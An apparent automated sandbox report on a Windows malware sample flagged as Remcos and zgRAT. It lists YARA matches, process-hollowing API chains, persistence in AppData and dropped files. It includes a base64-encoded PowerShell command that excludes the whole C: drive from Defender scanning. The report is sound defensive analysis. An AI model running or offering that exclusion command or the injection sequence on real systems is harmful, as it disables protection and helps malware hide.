Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 004310BE appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00402053 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00431740 appears 53 times

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00414EA8 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,

17_2_00414EA8

Sample file is different than original file name gathered from version info

Source: kyFBQxVbsg.exe, 00000000.00000002.540743790.0000000003687000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWoctlxtjcvxsj.dll" vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWoctlxtjcvxsj.dll" vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000000.371796335.0000000000392000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerc.exe4 vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe	Binary or memory string: OriginalFilenamerc.exe4 vs kyFBQxVbsg.exe

Source: kyFBQxVbsg.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Qerdo.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: kyFBQxVbsg.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File created: C:\Users\user\AppData\Roaming\Ppjollp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/10@117/1

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_004172C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

17_2_004172C8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00417CBB FindResourceA,LoadResource,LockResource,SizeofResource,

17_2_00417CBB

Source: kyFBQxVbsg.exe	Virustotal: Detection: 46%
Source: kyFBQxVbsg.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File read: C:\Users\user\Desktop\kyFBQxVbsg.exe

Jump to behavior

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\kyFBQxVbsg.exe "C:\Users\user\Desktop\kyFBQxVbsg.exe"
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00414706 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

17_2_00414706

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esjq1xkt.ffx.ps1

Jump to behavior

Source: kyFBQxVbsg.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040D3C8 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,

17_2_0040D3C8

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\cvxyttydfsgbghfgfhtd-RXTSAM

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: kyFBQxVbsg.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: kyFBQxVbsg.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: protobuf-net.pdbSHA256 source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
